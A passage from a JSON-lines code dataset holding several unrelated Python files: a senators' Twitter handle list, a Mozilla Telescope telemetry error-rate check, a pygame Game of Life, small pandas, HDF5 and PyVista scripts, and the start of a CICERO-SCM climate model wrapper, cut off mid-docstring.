(R-TN)\n ('BillCassidy', 'R'), # Bill Cassidy (R-LA)\n ('RoyBlunt', 'R'), # Roy Blunt (R-MO)\n ('SenatorBurr', 'R'), # Richard Burr (R-NC)\n ('SenShelby', 'R'), # Richard Shelby (R-AL)\n ('SenatorCollins', 'R'), # Susan Collins (R-ME)\n ('SenJohnMcCain', 'R'), # John McCain (R-AZ)\n ('senrobportman', 'R'), # Rob Portman (R-OH)\n ('JerryMoran', 'R' ), # Jerry Moran (R-KS)\n ('lisamurkowski', 'R'), # Lisa Murkowski (R-AK)\n ('JeffFlake', 'R'), # Jeff Flake (R-AZ)\n ('marcorubio', 'R'), # Marco Rubio (R-FL)\n ('JohnCornyn', 'R'), # John Cornyn (R-TX)\n ('SteveDaines', 'R'), # Steve Daines (R-MT)\n ('ChuckGrassley', 'R'), # Chuck Grassley (R-IA)\n ('JimInhofe', 'R'), # Jim Inhofe (R-OK)\n ('JohnBoozman', 'R'), # John Boozman (R-AR)\n ('SenMikeLee', 'R'), # Mike Lee (R-UT)\n\n\n # Democrats\n ('SenCortezMasto', 'D'), # Cortez MAsto (D-NV)\n ('SenKamalaHarris', 'D'), # Kamala Harris (D-CA)\n ('SenBrianSchatz', 'D'), # Brian Schatz (D-HI)\n ('MartinHeinrich', 'D'), # Martin Heinrich (D-NM)\n ('SenatorBaldwin', 'D'), # Tammy Baldwin (D-WI)\n ('SenatorHeitkamp', 'D'), # Heidi Heitkamp (D-ND)\n ('SenDuckworth', 'D'), # Tammy Duckworth (D-IL)\n ('SenWarren', 'D'), # Elizabeth Warren (D-MA)\n ('SenatorHassan', 'D'), # Maggie Hassan (D-NH)\n ('SenatorTester', 'D'), # Jon Tester (D-MT)\n ('SenJackReed', 'D'), # Jack Reed (D-RI)\n ('SenFeinstein', 'D'), # Dianne Feinstein (D-CA)\n ('PattyMurray', 'D'), # Patty Murray (D-WA)\n ('SenBlumenthal', 'D'), # Richard Blumenthal (D-CT)\n ('SenatorCarper', 'D'), # Tom Carper (D-DE)\n ('SenatorDurbin', 'D'), # Dick Durbin (D-IL)\n ('SenatorLeahy', 'D'), # Patrick Leahy (D-VT)\n ('SenWhitehouse', 'D'), # Sheldon Whitehouse (D-RI)\n ('SenGaryPeters', 'D'), # Gary Peters (D-MI)\n ('Sen_JoeManchin', 'D'), # JoeManchin (D-WV)\n ('SenBennetCO', 'D'), # Michael Bennet (D-CO)\n ('SenDonnelly', 'D'), # Joe Donnelly (D-IN)\n ('timkaine', 'D'), # Tim Kaine (D-VA)\n ('SenBobCasey', 'D'), # Bob Casey Jr. (D-PA)\n ('ChrisMurphyCT', 'D'), # Chris Murphy (D-CT)\n ('SenatorCantwell', 'D'), # Maria Cantwell (D-WA)\n ('SenatorShaheen', 'D'), # Jeanne Shaheen (D-NH)\n ('SenatorCardin', 'D'), # Ben Cardin (D-MD)\n ('maziehirono', 'D'), # Mazie Hirono (D-HI)\n ('SenStabenow', 'D'), # Debbie Stabenow (D-MI)\n ('SenGillibrand', 'D'), # Kirsten Gillibrand (D-NY)\n ('SenatorTomUdall', 'D'), # Tom Udall (D-NM)\n ('brianschatz', 'D'), # Brian Schatz (D-HI)\n ('SenSherrodBrown', 'D'), # Sherrod Brown (D-OH)\n ('amyklobuchar', 'D'), # Amy Klobuchar (D-MN)\n ('SenJeffMerkley', 'D'), # Jeff Merkley (D-OR)\n ('SenMarkey', 'D'), # Ed Markey (D-MA)\n ('SenBillNelson', 'D'), # Bill Nelson (D-FL)\n ('stabenow', 'D'), # Debbie Stabenow (D-MI)\n ('SenatorMenendez', 'D'), # Bob Menendez (D-NJ)\n ('ChrisVanHollen', 'D'), # Chris Van Hollen (D-MD)\n ('SenSchumer', 'D'), # Chuck Schumer (D-NY)\n ('clairecmc', 'D'), # Claire McCaskill (D-MO)\n ('CoryBooker', 'D'), # Corey Booker (D-NJ)\n ('ChrisCoons', 'D'), # Chris Coons (D-DE)\n ('MarkWarner', 'D'), # Mark Warner (D-VA)\n ('alfranken', 'D'), # Al Franken (D-MN)\n\n\n # Independents\n ('SenAngusKing', 'I'), # Angus King (I-ME)\n ('SenSanders', 'I'), # Bernie Sanders (I-VT)\n\n\n #'GrahamBlog', # TODO\n #'dscc', # Senate Democrats\n #'SenateGOP', # Senate Republicans\n #'SenateDems', # TODO SENATE DEMS\n #'SenateBudget', #\n #'SenateAgDems', # TODO\n #'McConnellPress', # TODO\n #'SenCoonsOffice', # TODO\n\n]\n","repo_name":"charlesrwinston/PoliticalClassifier","sub_path":"classifier/screen_names.py","file_name":"screen_names.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13721162102","text":"\"\"\"\nThe percentage of reported errors in Uptake Telemetry should be under the specified\nmaximum. Error rate is computed for each period of 10min.\n\nFor each recipe whose error rate is above the maximum, the total number of events\nfor each status is returned. The min/max timestamps give the datetime range of the\nobtained dataset.\n\"\"\"\nimport re\nfrom collections import Counter, defaultdict\nfrom typing import Dict, List, Tuple, Union\n\nfrom telescope.typings import CheckResult\nfrom telescope.utils import csv_quoted, fetch_bigquery, fetch_json\n\n\nEXPOSED_PARAMETERS = [\"max_error_percentage\", \"min_total_events\"]\nDEFAULT_PLOT = \".max_rate\"\n\nEVENTS_TELEMETRY_QUERY = r\"\"\"\n-- This query returns the total of events received per recipe and status.\n\n-- The events table receives data every 5 minutes.\n\nWITH event_uptake_telemetry AS (\n SELECT\n normalized_channel,\n timestamp AS submission_timestamp,\n UNIX_SECONDS(timestamp) AS epoch,\n (CASE WHEN session_start_time > timestamp THEN timestamp ELSE session_start_time END) AS client_timestamp,\n event_string_value,\n event_map_values,\n event_category,\n event_object\n FROM\n `moz-fx-data-shared-prod.telemetry_derived.events_live`\n WHERE\n timestamp > TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL {period_hours} HOUR)\n {channel_condition}\n),\nuptake_telemetry AS (\n SELECT\n submission_timestamp,\n normalized_channel,\n client_timestamp,\n event_string_value AS status,\n `moz-fx-data-shared-prod`.udf.get_key(event_map_values, \"source\") AS source,\n epoch - MOD(epoch, 600) AS period\n FROM\n event_uptake_telemetry\n WHERE event_category = 'uptake.remotecontent.result'\n AND event_object = 'normandy'\n -- Sanity check for client timestamps\n AND client_timestamp > TIMESTAMP_SUB(submission_timestamp, INTERVAL 1 DAY)\n)\nSELECT\n -- Min/Max timestamps of this period\n PARSE_TIMESTAMP('%s', CAST(period AS STRING)) AS min_timestamp,\n PARSE_TIMESTAMP('%s', CAST(period + 600 AS STRING)) AS max_timestamp,\n normalized_channel AS channel,\n source,\n status,\n COUNT(*) AS total\nFROM uptake_telemetry\nWHERE source LIKE 'normandy/%'\nGROUP BY period, normalized_channel, source, status\nORDER BY period, normalized_channel, source, status\n\"\"\"\n\nNORMANDY_URL = \"{server}/api/v1/recipe/signed/?enabled=1\"\n\n# Normandy uses the Uptake telemetry statuses in a specific way.\n# See https://searchfox.org/mozilla-central/rev/4218cb868d8deed13e902718ba2595d85e12b86b/toolkit/components/normandy/lib/Uptake.jsm#23-43\nUPTAKE_STATUSES = {\n \"recipe_action_disabled\": \"custom_1_error\",\n \"recipe_didnt_match_filter\": \"backoff\",\n \"recipe_execution_error\": \"apply_error\",\n \"recipe_filter_broken\": \"content_error\",\n \"recipe_invalid_action\": \"download_error\",\n \"runner_invalid_signature\": \"signature_error\",\n \"action_pre_execution_error\": \"custom_1_error\",\n \"action_post_execution_error\": \"custom_2_error\",\n}\n\n# Invert status dict {(\"recipe\", \"custom_1_error\"): \"recipe_action_disabled\", ...}\nNORMANDY_STATUSES = {(k.split(\"_\")[0], v): k for k, v in UPTAKE_STATUSES.items()}\n\n\nasync def fetch_normandy_uptake(channels: List[str], period_hours: int):\n # Filter by channel if parameter is specified.\n channel_condition = (\n f\"AND LOWER(normalized_channel) IN ({csv_quoted(channels)})\" if channels else \"\"\n )\n return await fetch_bigquery(\n EVENTS_TELEMETRY_QUERY.format(\n period_hours=period_hours, channel_condition=channel_condition\n )\n )\n\n\ndef sort_dict_desc(d, key):\n return dict(sorted(d.items(), key=key, reverse=True))\n\n\nasync def run(\n max_error_percentage: Union[float, Dict],\n server: str,\n min_total_events: int = 20,\n ignore_status: List[str] = [],\n sources: List[str] = [],\n channels: List[str] = [],\n period_hours: int = 6,\n) -> CheckResult:\n if not isinstance(max_error_percentage, dict):\n max_error_percentage = {\"default\": max_error_percentage}\n # max_error_percentage[\"default\"] is mandatory.\n max_error_percentage.setdefault(\"with_telemetry\", max_error_percentage[\"default\"])\n max_error_percentage.setdefault(\n \"with_classify_client\", max_error_percentage[\"default\"]\n )\n\n # By default, only look at recipes.\n if len(sources) == 0:\n sources = [\"recipe\"]\n\n sources_re = [re.compile(s) for s in sources]\n\n # Ignored statuses are specified using the Normandy ones.\n ignored_status = [UPTAKE_STATUSES.get(s, s) for s in ignore_status]\n\n # Fetch list of enabled recipes from Normandy server.\n normandy_url = NORMANDY_URL.format(server=server)\n normandy_recipes = await fetch_json(normandy_url)\n enabled_recipes_by_ids = {\n str(r[\"recipe\"][\"id\"]): r[\"recipe\"] for r in normandy_recipes\n }\n enabled_recipe_ids = enabled_recipes_by_ids.keys()\n\n rows = await fetch_normandy_uptake(channels=channels, period_hours=period_hours)\n\n min_timestamp = min(r[\"min_timestamp\"] for r in rows)\n max_timestamp = max(r[\"max_timestamp\"] for r in rows)\n\n # We will store reported events by period, by collection,\n # by version, and by status.\n # {\n # ('2020-01-17T07:50:00', '2020-01-17T08:00:00'): {\n # 'recipes/113': {\n # 'success': 4699,\n # 'sync_error': 39\n # },\n # ...\n # }\n # }\n periods: Dict[Tuple[str, str], Dict] = {}\n for row in rows:\n # Check if the source matches the selected ones.\n source = row[\"source\"].replace(\"normandy/\", \"\")\n if not any(s.match(source) for s in sources_re):\n continue\n\n period: Tuple[str, str] = (\n row[\"min_timestamp\"].isoformat(),\n row[\"max_timestamp\"].isoformat(),\n )\n periods.setdefault(period, defaultdict(Counter))\n\n status = row[\"status\"]\n if \"recipe\" in source:\n # Make sure this recipe is enabled, otherwise ignore.\n rid = row[\"source\"].split(\"/\")[-1]\n if rid not in enabled_recipe_ids:\n continue\n # In Firefox 67, `custom_2_error` was used instead of `backoff`.\n if status == \"custom_2_error\":\n status = \"backoff\"\n\n periods[period][source][status] += row[\"total\"]\n\n error_rates: Dict[str, Dict] = {}\n min_rate = None\n max_rate = None\n for (min_period, max_period), by_collection in periods.items():\n # Compute error rate by period.\n # This allows us to prevent error rate to be \"spread\" over the overall datetime\n # range of events (eg. a spike of errors during 10min over 2H).\n for source, all_statuses in by_collection.items():\n total_statuses = sum(total for status, total in all_statuses.items())\n\n # Ignore uptake Telemetry of a certain recipe if the total of collected\n # events is too small.\n if total_statuses < min_total_events:\n continue\n\n # Show overridden status in check output.\n source_type = source.split(\"/\")[0]\n statuses = {\n NORMANDY_STATUSES.get((source_type, status), status): total\n for status, total in all_statuses.items()\n if status not in ignored_status\n }\n ignored = {\n NORMANDY_STATUSES.get((source_type, status), status): total\n for status, total in all_statuses.items()\n if status in ignored_status\n }\n total_errors = sum(\n total\n for status, total in statuses.items()\n if UPTAKE_STATUSES.get(status, status).endswith(\"_error\")\n )\n error_rate = round(total_errors * 100 / total_statuses, 2)\n\n if min_rate is None:\n min_rate = max_rate = error_rate\n else:\n min_rate = min(min_rate, error_rate)\n max_rate = max(max_rate, error_rate)\n\n # If error rate for this period is below threshold, or lower than one reported\n # in another period, then we ignore it.\n other_period_rate = error_rates.get(source, {\"error_rate\": 0.0})[\n \"error_rate\"\n ]\n\n details = {}\n max_percentage = max_error_percentage[\"default\"]\n if \"recipe\" in source:\n rid = source.split(\"/\")[-1]\n recipe = enabled_recipes_by_ids[rid]\n with_telemetry = \"normandy.telemetry\" in recipe[\"filter_expression\"]\n with_classify_client = \"normandy.country\" in recipe[\"filter_expression\"]\n details[\"name\"] = recipe[\"name\"]\n details[\"with_telemetry\"] = with_telemetry\n details[\"with_classify_client\"] = with_classify_client\n if with_telemetry:\n max_percentage = max_error_percentage[\"with_telemetry\"]\n # If recipe has both Telemetry and Classify Client, keep highest threshold.\n if with_classify_client:\n max_percentage = max(\n max_percentage, max_error_percentage[\"with_classify_client\"]\n )\n\n if error_rate < max_percentage or error_rate < other_period_rate:\n continue\n\n error_rates[source] = {\n \"error_rate\": error_rate,\n **details,\n \"statuses\": sort_dict_desc(statuses, key=lambda item: item[1]),\n \"ignored\": sort_dict_desc(ignored, key=lambda item: item[1]),\n \"min_timestamp\": min_period,\n \"max_timestamp\": max_period,\n }\n\n sort_by_rate = sort_dict_desc(error_rates, key=lambda item: item[1][\"error_rate\"])\n\n data = {\n \"sources\": sort_by_rate,\n \"min_rate\": min_rate,\n \"max_rate\": max_rate,\n \"min_timestamp\": min_timestamp.isoformat(),\n \"max_timestamp\": max_timestamp.isoformat(),\n }\n \"\"\"\n {\n \"sources\": {\n \"recipes/123\": {\n \"error_rate\": 60.4,\n \"name\": \"Disable OS auth\",\n \"with_classify_client\": true,\n \"with_telemetry\": false,\n \"statuses\": {\n \"recipe_execution_error\": 56,\n \"success\": 35,\n \"action_post_execution_error\": 5\n },\n \"ignored\": {\n \"recipe_didnt_match_filter\": 5\n },\n \"min_timestamp\": \"2020-01-17T08:10:00\",\n \"max_timestamp\": \"2020-01-17T08:20:00\",\n },\n ...\n },\n \"min_rate\": 2.1,\n \"max_rate\": 60.4,\n \"min_timestamp\": \"2020-01-17T08:00:00\",\n \"max_timestamp\": \"2020-01-17T10:00:00\"\n }\n \"\"\"\n return len(sort_by_rate) == 0, data\n","repo_name":"mozilla-services/telescope","sub_path":"checks/normandy/uptake_error_rate.py","file_name":"uptake_error_rate.py","file_ext":"py","file_size_in_byte":10727,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"76"} +{"seq_id":"22624166189","text":"import functools\nimport operator\nfrom typing import Set\nimport pygame\nfrom life.world import World\nimport random as rand\nfrom life.coordinate import Coordinate\n\n\nclass Game:\n \"\"\"\n represents an instance of Conway's Game of Life\n\n fields:\n world: World\n an instance of World with a state and a method to transition to the next state\n\n cell_size: int\n The desired size of a rendered cell. Cells are square, so length == width == size\n\n methods:\n play() -> None\n plays the game by rendering each state of the World on a Pygame surface until the user\n closes the game window\n \"\"\"\n def __init__(self, cell_size: int, initial_state: Set[Coordinate] = None) -> None:\n \"\"\"\n instantiates a Game\n\n :param cell_size: the desired size of a rendered cell in pixels\n\n :param initial_state: an initial state for a World\n\n :returns None\n \"\"\"\n self.__screen_dimensions = Game.__get_screen_dimensions()\n self.__validate_cell_size(cell_size)\n self.__cell_size = cell_size\n if initial_state is not None:\n self.world = World(initial_state)\n else:\n random_state = self.__get_random_state(0.075)\n self.world = World(random_state)\n\n @staticmethod\n def __get_screen_dimensions() -> Coordinate:\n \"\"\"\n returns screen dimensions in pixels as a tuple of form (width, height)\n\n :returns screen dimensions in pixels as a tuple of form (width, height)\n \"\"\"\n pygame.init()\n dimensions = Coordinate(pygame.display.Info().current_w, pygame.display.Info().current_h)\n pygame.quit()\n return dimensions\n\n def __validate_cell_size(self, cell_size: int) -> None:\n \"\"\"\n validates a given cell_size\n\n :raises ValueError if cell_size is negative or cell_size is too big for screen\n\n :param cell_size: the desired size of a rendered cell in pixels\n\n :returns None\n \"\"\"\n if cell_size < 0:\n raise ValueError(\"The cell_size cannot be negative.\")\n\n cell_is_too_big = any(dim for dim in self.__screen_dimensions if cell_size > dim)\n if cell_is_too_big:\n raise ValueError(\"The cell_size must not exceed any of the screen's dimensions.\")\n\n def __get_random_state(self, density: float) -> Set[Coordinate]:\n \"\"\"\n returns a random state scaled to fill the screen when rendered\n\n :raises ValueError if density is not in the interval [0, 1]\n\n :param density: the proportion of all cells possible to render on the screen that are live\n\n :returns a random state scaled to fill the screen when rendered\n \"\"\"\n if density < 0 or density > 1:\n raise ValueError(\"The value of density must be in the interval [0, 1].\")\n\n screen_area = functools.reduce(operator.mul, self.__screen_dimensions, 1)\n cell_area = self.__cell_size ** 2\n total_cells = screen_area // cell_area\n desired_cells = int(total_cells * density)\n max_coordinate = Coordinate(*(d // self.__cell_size for d in self.__screen_dimensions))\n candidates = [\n Coordinate(i, j)\n for i in range(max_coordinate.x + 1) for j in range(max_coordinate.y + 1)\n ]\n state = set(rand.sample(candidates, desired_cells))\n return state\n\n def play(self, delay: float) -> None:\n \"\"\"\n plays Conway's Game of Life\n\n continually renders each state of self.world on a Pygame surface until the user closes\n the game window\n\n :param delay: the delay between iterations of the game loop in seconds (i.e. the approximate\n delay between rendered frames)\n\n :returns None\n \"\"\"\n def scaled_coordinate(coordinate: Coordinate) -> Coordinate:\n \"\"\"\n returns the given coordinate scaled by cell_size and adjusted for a toroidal grid\n\n A coordinate is scaled by cell_size by multiplying each component by cell_size. A\n coordinate is adjusted for a toroidal grid by taking the x-coordinate and y-coordinate\n modulo the screen width and screen height respectively.\n\n :returns the given coordinate adjusted for toroidal geometry and scaled by cell_size\n \"\"\"\n scaled_coordinate = (c * self.__cell_size for c in coordinate)\n scaled_coordinate = tuple(\n operator.mod(*entry) for entry in zip(scaled_coordinate, self.__screen_dimensions)\n )\n return scaled_coordinate\n\n pygame.init()\n surface = pygame.display.set_mode(self.__screen_dimensions, pygame.FULLSCREEN)\n colours = {'white': (255,) * 3, 'green': (0, 175, 0)}\n while not pygame.event.get(pygame.QUIT):\n surface.fill(colours['white'])\n for coordinate in self.world.state:\n cell = pygame.Rect(scaled_coordinate(coordinate), (self.__cell_size,) * 2)\n pygame.draw.rect(surface, colours['green'], cell)\n pygame.display.flip()\n self.world.next_state()\n pygame.time.delay(int(delay * 1000))\n pygame.quit()\n","repo_name":"bshapka/life-in-python","sub_path":"life/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3499864189","text":"#class\n\nclass FourCal:\n def __init__(self,first,second):\n self.first = first\n self.second = second\n\n \n def setdata(self,first,second): #메소드를 만들 때 첫번째 인수값으로 self를 무조건 넣어야함\n self.first = first\n self.second = second\n\n def add(self):\n result = self.first + self.second\n return result\n def mul(self):\n result = self.first * self.second\n return result\n def sub(self):\n result = self.first - self.second\n return result\n def div(self):\n result = self.first / self.second \n return result\n\n #생성자를 만들면 객체 생성시 매개변수를 넣어주어야 오류가 뜨지 않는다\n\na=FourCal(1123123123,212342314124234)\na.setdata(10,20)\nprint(a.first)\nprint(a.second)\n\nb=FourCal(12354353543534525,524534532542543345)\nb.setdata(50,60)\nprint(b.first)\nprint(b.second)\nprint(b. add())\nprint(b. mul())\nprint(b. sub())\nprint(b. div())\n\n#inheri\nclass SafeFourCal(FourCal): #클래스 상속\n def div(self): #메소드 오버라이딩\n if self.second==0:\n return 0\n else: self.first / self.second\n \na=SafeFourCal(4,0)\nprint('SafeFourCal.div(4,0) => ',a.div())\n\na.setdata(4,2)\nprint(a.div())\n\n\n\n","repo_name":"yohan-j-park/yohanpark","sub_path":"Python/fourcal.py","file_name":"fourcal.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10553014533","text":"#### Separate multiple comma-separated values from a column ####\n\nimport pandas as pd\n\n### my data ###\ntt = pd.DataFrame({'IR': ['IR1', 'IR2', 'IR3', 'IR4', 'IR5'],\n 'category': ['vpn', 'vpn', 'teradata', 'account request', 'vpn'],\n 'approvers': ['UO1', 'UO1,UO2,UO3', 'UO1,UO2,UO3,UO4,UO5', 'UO1,SO1,SO3', 'SO3,UO1']})\n\ntt\n\n## create dataframe w/ rows for each ticket + approver\ntt_spread = tt.set_index('IR').approvers.str.split(',', expand=True).stack().reset_index(1, drop=True).reset_index(name='approvers')\ntt_spread\ntt_spread['approvers'].value_counts()\n\n## append back to original dataframe\nout = pd.merge(tt, tt_spread, how='inner', on='IR')\nout\nout['approvers_y'].value_counts()\n\n\n\n##### tickets #####\n\n\ncr = pd.read_excel(\"C:\\\\Work\\\\Requests\\\\Don Richards\\\\2018-08-15 change log text mining\\\\tickets_type.xlsx\")\ndf = cr\nlist(df)\n\ndf['approvers'] = df['approvers'].str.replace(' ','')\ndf['approvers']\n\ndf_split = df.set_index('Req ID').approvers.str.split(',', expand=True).stack().reset_index(1, drop=True).reset_index(name='approver')\n\nlist(df_split)\n\nout = pd.merge(df, df_split, how='inner', on='Req ID')\n\nout.to_excel(\"C:\\\\Work\\\\Requests\\\\Don Richards\\\\2018-08-15 change log text mining\\\\approver_dataset.xlsx\",\n index=False)\n\n","repo_name":"sqlitus/Python-Library","sub_path":"Scripts/Pandas - Separate multiple values in column.py","file_name":"Pandas - Separate multiple values in column.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22599160025","text":"\"\"\"\nAuthor: Dominik Limbach\nDescription: handle import and export of hdf5 data\n\"\"\"\n\nimport h5py\nimport numpy\nimport cv2\n\nimport os\nimport os.path\n\n\ndef thermal(h5filename, date, destination_dir):\n try:\n thermal_filename = 'Z:\\\\Thermal\\\\' + date + '\\\\' + h5filename\n th5file = h5py.File(thermal_filename, 'r')\n tdata = th5file['FRAMES']\n tstamps_t = th5file['Timestamps_ms']\n n_frames, height, width, total_time_ms = [tdata.attrs[i] for i in list(tdata.attrs)]\n tframe = tdata[200, 0:480, :]\n raw_img = cv2.normalize(tframe, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)\n disp_img = cv2.applyColorMap(raw_img, cv2.COLORMAP_HOT)\n cv2.imwrite(destination_dir + '\\\\preview_thermal.png', disp_img)\n except FileNotFoundError:\n blank_image = numpy.zeros((480, 640, 3), numpy.uint8)\n cv2.imwrite(destination_dir + '\\\\blank.png', blank_image)\n\n\n# def load_thermal_file(h5filename, date):\n# try:\n# filename = 'Z:\\\\Thermal\\\\' + date + '\\\\' + h5filename\n# file = h5py.File(filename, 'r')\n# data = file['FRAMES']\n# timestamps = file['Timestamps_ms']\n# except FileNotFoundError:\n# data = []\n# timestamps = []\n#\n# return data, timestamps\n\n\ndef load_thermal_file(_filename, _folder):\n try:\n filepath = _folder + '\\\\' + _filename\n file = h5py.File(filepath, 'r')\n data = file['FRAMES']\n timestamps = file['Timestamps_ms']\n except FileNotFoundError:\n data = []\n timestamps = []\n\n return data, timestamps\n\n\ndef write_frames_to_files(dataset, filename: str = 'ThermalImg_',\n destination_dir: str = 'E:\\\\GitHub\\\\CovPySourceFile\\\\ThermalImages\\\\'):\n\n n_frames, height, width, total_time_ms = [dataset.attrs[i] for i in list(dataset.attrs)]\n\n for n in range(0, n_frames):\n frame = dataset[n, 0:height, :]\n raw_img = cv2.normalize(frame, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)\n disp_img = cv2.applyColorMap(raw_img, cv2.COLORMAP_HOT)\n cv2.imwrite(destination_dir + filename + '{}.png'.format(n), disp_img)\n\n\ndef images_to_video(image_dir: str = 'E:\\\\GitHub\\\\CovPySourceFile\\\\ThermalImages\\\\',\n target_dir: str = 'E:\\\\GitHub\\\\CovPySourceFile\\\\Video\\\\',\n image_name_tag: str = 'ThermalImg',\n video_name: str = 'ThermalVideo',\n file_type: str = '.png'):\n\n n_imgs = len([file for file in os.listdir(image_dir) if file.endswith(file_type)])\n img_array = []\n for n in range(0, n_imgs):\n img_name = image_dir + image_name_tag + '_{}'.format(n) + file_type\n img = cv2.imread(img_name)\n height, width, layers = img.shape\n size = (width, height)\n img_array.append(img)\n\n out = cv2.VideoWriter(target_dir + video_name + '.avi', cv2.VideoWriter_fourcc(*'DIVX'), fps=30, frameSize=size)\n\n for i in range(len(img_array)):\n out.write(img_array[i])\n out.release()\n\n\ndef load_frame_from_dataset(dataset, frame_height, frame_width, frame_number):\n return dataset[frame_number, 0:frame_height, 0:frame_width]\n\n\ndef load_sub_frame(dataset, y_range: tuple, x_range: tuple, frame_number):\n return dataset[frame_number, y_range[0]:y_range[1]+1, x_range[0]:x_range[1]+1]\n\n\n","repo_name":"meistalampe/rPPG","sub_path":"CovPy/hdf5_helper_functions.py","file_name":"hdf5_helper_functions.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11635115455","text":"import math\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nA, B = 1, 100\nEPSILON = 1e-2\nALPHA = 1e-5\n\ndef func(x1, x2, a=A, b=B):\n return (a-x1)**2 + b*(x2-x1**2)**2\n\nif __name__ == '__main__':\n x, y = np.meshgrid(np.linspace(-5, 5, 1000),\n np.linspace(-5, 5, 1000))\n plt.contourf(x, y, func(x, y), locator=matplotlib.ticker.LogLocator(), cmap='gnuplot')\n plt.colorbar()\n plt.xlabel('$x_1$')\n plt.ylabel('$x_2$')\n plt.title(\"Rosenbrock Potential\")\n plt.savefig(\"contour.png\")","repo_name":"calzonelover/Inverse_Theory","sub_path":"HW03/pb2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70100505207","text":"\"\"\"\n.. _rotate_example:\n\nRotations\n~~~~~~~~~\n\nRotations of a mesh about its axes. In this model, the x axis is from the left\nto right; the y axis is from bottom to top; and the z axis emerges from the\nimage. The camera location is the same in all four images.\n\n\"\"\"\n# sphinx_gallery_thumbnail_number = 3\nimport pyvista as pv\nfrom pyvista import examples\n\n###############################################################################\n# Define camera and axes\n# ++++++++++++++++++++++\n#\n# Define camera and axes. Setting axes origin to ``(3.0, 3.0, 3.0)``.\n\nmesh = examples.download_cow()\nmesh.points /= 1.5 # scale the mesh\n\ncamera = pv.Camera()\ncamera.position = (30.0, 30.0, 30.0)\ncamera.focal_point = (5.0, 5.0, 5.0)\n\naxes = pv.Axes(show_actor=True, actor_scale=2.0, line_width=5)\naxes.origin = (3.0, 3.0, 3.0)\n\n###############################################################################\n# Original Mesh\n# +++++++++++++\n#\n# Plot original mesh. Add axes actor to Plotter.\n\np = pv.Plotter()\n\np.add_text(\"Mesh\", font_size=24)\np.add_actor(axes.actor)\np.camera = camera\np.add_mesh(mesh)\n\np.show()\n\n###############################################################################\n# Rotation about the x axis\n# +++++++++++++++++++++++++\n#\n# Plot the mesh rotated about the x axis every 60 degrees.\n# Add the axes actor to the Plotter and set the axes origin to the point of rotation.\n\np = pv.Plotter()\n\np.add_text(\"X-Axis Rotation\", font_size=24)\np.add_actor(axes.actor)\np.camera = camera\n\nfor i in range(6):\n rot = mesh.rotate_x(60 * i, point=axes.origin, inplace=False)\n p.add_mesh(rot)\n\np.show()\n\n###############################################################################\n# Rotation about the y axis\n# +++++++++++++++++++++++++\n#\n# Plot the mesh rotated about the y axis every 60 degrees.\n# Add the axes actor to the Plotter and set the axes origin to the point of rotation.\n\np = pv.Plotter()\n\np.add_text(\"Y-Axis Rotation\", font_size=24)\np.camera = camera\np.add_actor(axes.actor)\n\nfor i in range(6):\n rot = mesh.rotate_y(60 * i, point=axes.origin, inplace=False)\n p.add_mesh(rot)\n\np.show()\n\n###############################################################################\n# Rotation about the z axis\n# +++++++++++++++++++++++++\n#\n# Plot the mesh rotated about the z axis every 60 degrees.\n# Add axes actor to the Plotter and set the axes origin to the point of rotation.\n\np = pv.Plotter()\n\np.add_text(\"Z-Axis Rotation\", font_size=24)\np.camera = camera\np.add_actor(axes.actor)\n\nfor i in range(6):\n rot = mesh.rotate_z(60 * i, point=axes.origin, inplace=False)\n p.add_mesh(rot)\n\np.show()\n\n###############################################################################\n# Rotation about a custom vector\n# ++++++++++++++++++++++++++++++\n#\n# Plot the mesh rotated about a custom vector every 60 degrees.\n# Add the axes actor to the Plotter and set axes origin to the point of rotation.\n\np = pv.Plotter()\n\np.add_text(\"Custom Vector Rotation\", font_size=24)\np.camera = camera\np.add_actor(axes.actor)\nfor i in range(6):\n rot = mesh.copy()\n rot.rotate_vector(vector=(1, 1, 1), angle=60 * i, point=axes.origin)\n p.add_mesh(rot)\n\np.show()\n","repo_name":"pyvista/pyvista","sub_path":"examples/01-filter/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":2055,"dataset":"github-code","pt":"76"} +{"seq_id":"23907586781","text":"\"\"\"\nCICEROSCM_WRAPPER for parallelisation\n\"\"\"\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess # nosec # have to use subprocess\nimport tempfile\nfrom distutils import dir_util\n\nimport numpy as np\nimport pandas as pd\nfrom scmdata import ScmRun, run_append\n\nfrom ...settings import config\nfrom ..utils.cicero_utils._utils import _get_unique_index_values\nfrom ._utils import _get_executable\nfrom .make_scenario_files import SCENARIOFILEWRITER\nfrom .read_results import CSCMREADER\nfrom .write_parameter_files import PARAMETERFILEWRITER\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef get_endyear(scenariodata):\n \"\"\"\n Get end year from scenariodata\n \"\"\"\n scenarioframe = scenariodata.reset_index(\n (\"model\", \"region\", \"scenario\", \"unit\"), drop=True\n )\n years = scenarioframe.columns\n if isinstance(years[0], pd.Timestamp):\n endyear = int(years[-1].year)\n else:\n endyear = int(years[-1])\n return endyear\n\n\nclass CiceroSCMWrapper: # pylint: disable=too-few-public-methods\n \"\"\"\n CICEROSCM Wrapper for parallel runs\n \"\"\"\n\n def __init__(self, scenariodata):\n \"\"\"\n Intialise CICEROSCM wrapper\n 